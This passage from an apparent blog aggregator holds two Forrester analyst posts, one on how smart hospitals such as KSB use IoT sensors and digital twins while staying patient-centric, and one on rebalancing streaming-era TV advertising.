interactive navigation kiosks, and tracks equipment and optimizes room availability through 7,000 internet-of-things sensors and 2,000 IoT tags using a Siemens asset tracking system. Notably, KSB created a digital twin of its building infrastructure, enabling predictive maintenance, patient flow simulation, resource optimization, and efficient management of building systems. The challenge for hospitals that embrace this approach lies in making the facility truly functional through change management. Smart hospitals like KSB guide staff on how to best operate in a transformed environment and explain how their roles will evolve. At the same time, they remain human-centric, guided by common sense and empathy. Small details underscore the importance of integrating technology in ways that support comfort and healing. Even the blinking light of a sensor can disrupt patient sleep. What Can US Health Systems Do Now To Transform? As transformative facilities emerge from existing infrastructure, health system leaders need to be strategic when overhauling their digital ecosystem. Here are three transformation strategies that leaders can use while keeping empathy at the heart of innovative decision-making: Take a calculated leap of faith. Emerging technologies such as digital twins have enormous potential, especially as the technology matures. Plausible use cases with measurable ROI are more difficult to predict and capture, however. To fully realize the potential of emerging technologies, hospitals must prioritize strategic implementation and build the necessary infrastructure to support future adoption and optimization. Turn experiences into actionable clinical intelligence. When redesigning hospital environments, collect measurable data on patient and staff experiences from multiple perspectives, both before and after any changes. This clinical intelligence serves a dual purpose: It drives operational improvements while demonstrating empathy, enabling leaders to refine care delivery and the workplace experience. Define partner nonnegotiables. Healthcare leaders should establish clear priorities when choosing vendor partners — i.e., focusing on healing architecture, digital infrastructure, or sustainability. The best partners will codesign solutions, share long-term goals, and help create care environments and improve workflows that support innovation, clinical excellence, and human connection. To dig deeper and prepare for your organization’s transformation to an IHO, check our latest report, Purposeful Tech Partnerships Unlock Healthcare Transformation. It applies the Forrester Intelligent Healthcare Organization Framework to inform technology choices and evolve partnership ecosystems. Please schedule a guidance session to learn more. Related Forrester Content source

Guided By Empathy: How Smart Hospitals Innovate While Staying Patient-Centric Read More »

Rewind And Fast-Forward TV Advertising

TV’s stakeholders — consumers, advertisers, and publishers — are out of sync. Consumers love streaming TV but say they don’t want streaming TV ads due to their frequency and irrelevance. Advertisers adopt genAI to try to make ads more compelling, but according to one member of Forrester’s Market Research Online Community, “when brands use generative AI in TV commercials, they lose their authenticity.” Consumers want to stream live sports, so publishers such as Disney and Netflix lure live sports fans to streaming TV, which seems like a win-win but complicates viewing. For example, in the NFL’s first week, consumers toggled between as many as eight streaming services to watch all 16 games. Next summer, the World Cup will spread across four streaming providers, adding friction to consumers’ fandom while duplicating advertisers’ reach. One of advertisers’ greatest challenges with TV advertising is “streaming TV’s high CPMs,” according to Forrester’s Q2 2025 CMO Pulse Survey. TV advertising’s sellers benefit at TV buyers’ expense, and consumers are caught in the middle. Transcend TV’s Past And Potential To Maximize Its Impact Once an offline, live, consolidated medium, TV is now internet-connected, on demand, and convoluted. While TV’s digital transformation makes the medium more addressable, programmatic, and measurable, it also upends TV’s role in the funnel, media plans, and advertising’s supply chain. Across TV planning, buying, and optimization workflows, advertisers need a strategy that blends the best of TV’s past and present. For instance, gross rating points, which correlate with brand energy but distance TV from the bottom of the funnel, can be phased out in favor of new KPIs that measure TV’s full-funnel efficacy. Other elements of TV’s past, like index-based buying and cost-effective reach, remain useful. To make TV advertising’s past and future more than the sum of their parts, marketers should: Minimize TV supply chain’s time to value. A complex supply chain, including publisher ad servers, supply-side platforms, automatic content recognition vendors, demand-side platforms, advertiser ad servers, and more, needlessly complicates TV advertising. Avoid this by getting as close as possible to TV viewers. Transact directly with publishers using technologies like Warner Bros. Discovery’s NEO, which launched at this year’s upfronts. Other publishers are following suit, offering buyers direct access to premium video inventory across streaming and linear TV. Clarify TV’s short- and long-term impacts. Continue using unaided awareness surveys to measure TV’s long-term impacts on new-to-brand sales, as brands have done for decades. Pair them with proof of TV’s immediate impacts on the middle of the funnel. In partnership with TV measurement providers, learn how TV ad exposures cause consumers who would have searched for generic search terms to, instead, search for branded terms. This makes TV plus search a more profitable way to compete for traffic. Overall, optimize for metrics such as blended ROAS and marketing expense ratio, which capture TV’s near- and long-term values. To learn more, Forrester clients can check out our latest report on TV advertising and schedule a guidance session to game-plan total TV. Always feel free to contact us with questions and feedback. source

Rewind And Fast-Forward TV Advertising Read More »